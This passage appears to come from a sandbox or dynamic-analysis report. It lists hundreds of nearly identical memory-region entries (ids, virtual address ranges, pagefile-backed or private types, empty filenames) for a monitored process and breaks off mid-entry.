region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10475 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10476 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10477 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10478 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10479 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10480 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10481 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10482 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10483 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10484 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10485 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10486 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10487 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10488 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10489 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10490 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10491 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10492 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10493 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10494 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10495 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10496 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10503 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10504 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10505 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10506 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10507 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10508 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10510 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10511 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10512 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10513 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10514 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10515 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10516 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10517 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10518 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10519 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10520 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10521 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10522 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10523 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10524 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10525 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10526 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10527 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10528 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10529 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10530 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10531 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10532 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10533 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10534 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10535 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10536 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10537 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10538 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10539 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10540 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10541 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10542 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10543 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10544 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10545 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10546 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10582 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10583 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10584 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10585 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10586 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10587 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10588 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10589 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10590 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10591 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10592 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10593 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10594 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10595 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10596 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10597 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10598 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10599 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10600 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10601 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10602 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10603 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10604 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10605 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10606 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10607 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10608 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10609 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10610 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10611 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10704 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10705 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10706 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10707 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10708 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10709 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10716 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10728 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10729 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10730 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10731 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10738 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10739 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10755 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10756 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10757 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10758 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10759 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10760 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10761 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10762 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10763 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10764 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10765 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10767 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10769 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10771 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10772 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10773 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10774 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10782 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10783 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10784 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10785 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10786 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10787 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10788 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10789 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10790 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10791 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10792 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10793 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10794 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10795 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10802 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10803 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10804 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10805 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10806 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10815 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 